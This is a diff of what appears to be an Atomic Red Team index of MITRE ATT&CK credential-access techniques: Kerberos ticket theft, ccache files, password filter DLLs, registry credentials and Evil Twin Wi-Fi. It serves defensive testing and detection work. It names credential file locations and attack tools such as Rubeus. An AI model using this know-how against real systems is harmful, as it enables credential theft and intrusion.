       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Process: Process Access'
-      - 'Process: OS API Execution'
-      - 'File: File Access'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1040:
     technique:
-      modified: '2024-04-19T12:32:44.370Z'
+      modified: '2024-10-15T15:11:55.217Z'
       name: Network Sniffing
       description: |-
         Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -90158,7 +90804,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1040
     atomic_tests:
     - name: Packet Capture Linux using tshark or tcpdump
@@ -90677,7 +91322,7 @@ credential-access:
         elevation_required: true
   T1552.002:
     technique:
-      modified: '2023-07-28T18:29:56.525Z'
+      modified: '2024-10-15T16:26:46.873Z'
       name: 'Unsecured Credentials: Credentials in Registry'
       description: |-
         Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
@@ -90726,9 +91371,8 @@ credential-access:
         url: https://pentestlab.blog/2017/04/19/stored-credentials/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.002
     atomic_tests:
     - name: Enumeration for Credentials in Registry
@@ -90758,31 +91402,7 @@ credential-access:
         name: command_prompt
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -90806,22 +91426,44 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests:
     - name: Install and Register Password Filter DLL
@@ -90917,58 +91559,89 @@ credential-access:
           remove-item C:\Windows\System32\#{dll_name}
         name: powershell
         elevation_required: true
-  T1558.004:
-    technique:
-      x_mitre_platforms:
-      - Windows
+  T1558.005:
+    technique:
+      modified: '2024-10-14T21:26:37.856Z'
+      name: Ccache Files
+      description: "\nAdversaries may attempt to steal Kerberos tickets stored in
+        credential cache files (or ccache). These files are used for short term storage
+        of a user's active session credentials. The ccache file is created upon user
+        authentication and allows for access to multiple services without the user
+        having to re-enter credentials. \n\nThe <code>/etc/krb5.conf</code> configuration
+        file and the <code>KRB5CCNAME</code> environment variable are used to set
+        the storage location for ccache entries. On Linux, credentials are typically
+        stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`.
+        On macOS, ccache entries are stored by default in memory with an `API:{uuid}`
+        naming scheme. Typically, users interact with ticket storage using <code>kinit</code>,
+        which obtains a Ticket-Granting-Ticket (TGT) for the principal; <code>klist</code>,
+        which lists obtained tickets currently held in the credentials cache; and
+        other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense
+        Kerberos Linux)\n\nAdversaries can collect tickets from ccache files stored
+        on disk and authenticate as the current user without their password to perform
+        [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.
+        Adversaries can also use these tickets to impersonate legitimate users with
+        elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004).
+        Tools like Kekeo can also be used by adversaries to convert ccache files to
+        Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008).
+        On macOS, adversaries may use open-source tools or the Kerberos framework
+        to interact with ccache files and extract TGTs or Service Tickets via lower-level
+        APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos
+        Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_contributors:
-      - Yossi Nisani, Cymptom
-      - James Dunn, @jamdunnDFW, EY
-      - Swapnil Kumbhar
-      - Jacques Pluviose, @Jacqueswildy_IT
-      - Dan Nutting, @KerberToast
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'File: File Access'
       type: attack-pattern
-      created: '2020-08-24T13:43:00.028Z'
+      id: attack-pattern--394220d9-8efc-4252-9040-664f7b115be6
+      created: '2024-09-17T15:02:31.324Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1558.004
-        url: https://attack.mitre.org/techniques/T1558/004
-      - source_name: Harmj0y Roasting AS-REPs Jan 2017
-        url: http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
-        description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August
-          24, 2020.
-      - source_name: Microsoft Kerberos Preauth 2014
-        url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
-        description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
-          It Should Not Be Disabled. Retrieved August 25, 2020.'
-      - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
-        url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
-        description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
-          with AS-REP Roasting. Retrieved August 24, 2020.
-      - description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
-          Guard Dog of Hades. Retrieved March 22, 2018.
-        source_name: SANS Attacking Kerberos Nov 2014
-        url: https://redsiege.com/kerberoast-slides
-      - url: https://adsecurity.org/?p=2293
-        description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
-          Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
-          Domain. Retrieved March 22, 2018.
-        source_name: AdSecurity Cracking Kerberos Dec 2015
-      - url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
-          using Azure Security Center. Retrieved March 23, 2018.
-        source_name: Microsoft Detecting Kerberoasting Feb 2018
-      - source_name: Microsoft 4768 TGT 2017
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
-        description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
-          ticket (TGT) was requested. Retrieved August 24, 2020.'
-      modified: '2021-06-07T19:23:33.039Z'
+        url: https://attack.mitre.org/techniques/T1558/005
+        external_id: T1558.005
+      - source_name: Binary Defense Kerberos Linux
+        description: " ARC Labs, Dwyer, John. Gonzalez, Eric. Hudak, Tyler. (2024,
+          October 1). Shining a Light in the Dark – How Binary Defense Uncovered an
+          APT Lurking in Shadows of IT. Retrieved October 7, 2024."
+        url: https://www.binarydefense.com/resources/blog/shining-a-light-in-the-dark-how-binary-defense-uncovered-an-apt-lurking-in-shadows-of-it/
+      - source_name: Kerberos GNU/Linux
+        description: Adepts of 0xCC. (2021, January 28). The Kerberos Credential Thievery
+          Compendium (GNU/Linux). Retrieved September 17, 2024.
+        url: https://adepts.of0x.cc/kerberos-thievery-linux/
+      - source_name: Kekeo
+        description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
+        url: https://github.com/gentilkiwi/kekeo
+      - source_name: SpectorOps Bifrost Kerberos macOS 2019
+        description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
+          Retrieved October 6, 2021.
+        url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
+      - source_name: Brining MimiKatz to Unix
+        description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
+          Mimikatz et al to UNIX. Retrieved October 13, 2021.
+        url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
+      - source_name: Linux Kerberos Tickets
+        description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
+          Teams. Retrieved October 4, 2021.
+        url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1558.004:
+    technique:
+      modified: '2024-10-15T15:32:07.850Z'
       name: 'Steal or Forge Kerberos Tickets: AS-REP Roasting'
       description: "Adversaries may reveal credentials of accounts that have disabled
         Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002)
@@ -91003,6 +91676,13 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Yossi Nisani, Cymptom
+      - James Dunn, @jamdunnDFW, EY
+      - Swapnil Kumbhar
+      - Jacques Pluviose, @Jacqueswildy_IT
+      - Dan Nutting, @KerberToast
+      x_mitre_deprecated: false
       x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
         TGS service ticket requests. Particularly investigate irregular patterns of
         activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within
@@ -91010,17 +91690,58 @@ credential-access:
         pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking
         Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation:
         Microsoft 4768 TGT 2017)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Credential Request'
-      x_mitre_permissions_required:
-      - User
       x_mitre_system_requirements:
       - Valid domain account
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+      created: '2020-08-24T13:43:00.028Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1558/004
+        external_id: T1558.004
+      - source_name: Microsoft Detecting Kerberoasting Feb 2018
+        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+          using Azure Security Center. Retrieved March 23, 2018.
+        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
+      - source_name: Harmj0y Roasting AS-REPs Jan 2017
+        description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved September
+          23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/roasting-as-reps/
+      - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
+        description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
+          with AS-REP Roasting. Retrieved August 24, 2020.
+        url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
+      - source_name: SANS Attacking Kerberos Nov 2014
+        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+          Guard Dog of Hades. Retrieved March 22, 2018.
+        url: https://redsiege.com/kerberoast-slides
+      - source_name: AdSecurity Cracking Kerberos Dec 2015
+        description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
+          Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
+          Domain. Retrieved March 22, 2018.
+        url: https://adsecurity.org/?p=2293
+      - source_name: Microsoft 4768 TGT 2017
+        description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
+          ticket (TGT) was requested. Retrieved August 24, 2020.'
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
+      - source_name: Microsoft Kerberos Preauth 2014
+        description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
+          It Should Not Be Disabled. Retrieved August 25, 2020.'
+        url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1558.004
     atomic_tests:
     - name: Rubeus asreproast
@@ -91106,17 +91827,12 @@ credential-access:
         name: powershell
   T1558:
     technique:
-      modified: '2024-03-01T16:58:02.395Z'
+      modified: '2024-09-17T19:49:11.455Z'
       name: Steal or Forge Kerberos Tickets
       description: |
         Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting.  Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.
 
         On Windows, the built-in <code>klist</code> utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)
-
-        Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in <code>/var/lib/sss/secrets/secrets.ldb</code> as well as the corresponding key located in <code>/var/lib/sss/secrets/.secrets.mkey</code>. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
-
-
-        Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the <code>/etc/krb5.conf</code> configuration file and the <code>KRB5CCNAME</code> environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using <code>kinit</code>, <code>klist</code>, <code>ktutil</code>, and <code>kcc</code> built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
@@ -91152,7 +91868,7 @@ credential-access:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Logon Session: Logon Session Metadata'
@@ -91177,13 +91893,6 @@ credential-access:
         description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
           using Azure Security Center. Retrieved March 23, 2018.
         url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-      - source_name: Kekeo
-        description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
-        url: https://github.com/gentilkiwi/kekeo
-      - source_name: SpectorOps Bifrost Kerberos macOS 2019
-        description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
-          Retrieved October 6, 2021.
-        url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
       - source_name: Medium Detecting Attempts to Steal Passwords from Memory
         description: French, D. (2018, October 2). Detecting Attempts to Steal Passwords
           from Memory. Retrieved October 11, 2019.
@@ -91192,14 +91901,6 @@ credential-access:
         description: Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket
           Attacks. Retrieved February 27, 2020.
         url: https://blog.stealthbits.com/detect-pass-the-ticket-attacks
-      - source_name: macOS kerberos framework MIT
-        description: Massachusetts Institute of Technology. (2007, October 27). Kerberos
-          for Macintosh Preferences Documentation. Retrieved October 6, 2021.
-        url: http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html
-      - source_name: MIT ccache
-        description: 'Massachusetts Institute of Technology. (n.d.). MIT Kerberos
-          Documentation: Credential Cache. Retrieved October 4, 2021.'
-        url: https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
       - source_name: AdSecurity Cracking Kerberos Dec 2015
         description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
           Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
@@ -91221,23 +91922,14 @@ credential-access:
         description: Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s
           Secret Decoder Ring. Retrieved February 27, 2020.
         url: https://adsecurity.org/?p=227
-      - source_name: Brining MimiKatz to Unix
-        description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
-          Mimikatz et al to UNIX. Retrieved October 13, 2021.
-        url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
-      - source_name: Linux Kerberos Tickets
-        description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
-          Teams. Retrieved October 4, 2021.
-        url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555:
     technique:
-      modified: '2024-02-26T14:19:09.417Z'
+      modified: '2024-10-15T14:57:46.850Z'
       name: Credentials from Password Stores
       description: 'Adversaries may search for common password storage locations to
         obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored
@@ -91288,7 +91980,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555
     atomic_tests:
     - name: Extract Windows Credential Manager via VBA
@@ -91416,7 +92107,7 @@ credential-access:
         name: powershell
   T1552:
     technique:
-      modified: '2024-04-15T21:33:12.892Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Unsecured Credentials
       description: 'Adversaries may search compromised systems to find and obtain
         insecurely stored credentials. These credentials can be stored and/or misplaced
@@ -91428,6 +92119,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Austin Clark, @c2defense
       x_mitre_deprecated: false
@@ -91442,18 +92134,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Access'
       - 'Application Log: Application Log Content'
@@ -91476,9 +92168,6 @@ credential-access:
         url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552
     atomic_tests:
     - name: AWS - Retrieve EC2 Password Data using stratus
@@ -91560,32 +92249,113 @@ credential-access:
           '
         name: powershell
         elevation_required: true
+  T1557.004:
+    technique:
+      modified: '2024-11-11T18:52:53.686Z'
+      name: Evil Twin
+      description: "Adversaries may host seemingly genuine Wi-Fi access points to
+        deceive users into connecting to malicious networks as a way of supporting
+        follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+        [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+        or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+        ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+        network, fraudulent Wi-Fi access points may trick devices or users into connecting
+        to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+        evil twin)  Adversaries may provide a stronger signal strength or block access
+        to Wi-Fi access points to coerce or entice victim devices into connecting
+        to malicious networks.(Citation: specter ops evil twin)  A Wi-Fi Pineapple
+        – a network security auditing and penetration testing tool – may be deployed
+        in Evil Twin attacks for ease of use and broader range. Custom certificates
+        may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+        may also listen for client devices sending probe requests for known or previously
+        connected networks (Preferred Network Lists or PNLs). When a malicious access
+        point receives a probe request, adversaries can respond with the same SSID
+        to imitate the trusted, known network.(Citation: specter ops evil twin)  Victim
+        devices are led to believe the responding access point is from their PNL and
+        initiate a connection to the fraudulent network.\n\nUpon logging into the
+        malicious Wi-Fi access point, a user may be directed to a fake login page
+        or captive portal webpage to capture the victim’s credentials. Once a user
+        is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+        network activity, manipulate data, or steal additional credentials. Locations
+        with high concentrations of public Wi-Fi access, such as airports, coffee
+        shops, or libraries, may be targets for adversaries to set up illegitimate
+        Wi-Fi access points. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - DeFord L. Smith
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      type: attack-pattern
+      id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+      created: '2024-09-17T14:27:40.947Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1557/004
+        external_id: T1557.004
+      - source_name: Kaspersky evil twin
+        description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+          them. Retrieved September 17, 2024.
+        url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+      - source_name: medium evil twin
+        description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+          Attack. Retrieved September 17, 2024.
+        url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+      - source_name: specter ops evil twin
+        description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+          Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+          17, 2024.
+        url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+      - source_name: Australia ‘Evil Twin’
+        description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+          WiFi attack on plane. Retrieved September 17, 2024.
+        url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
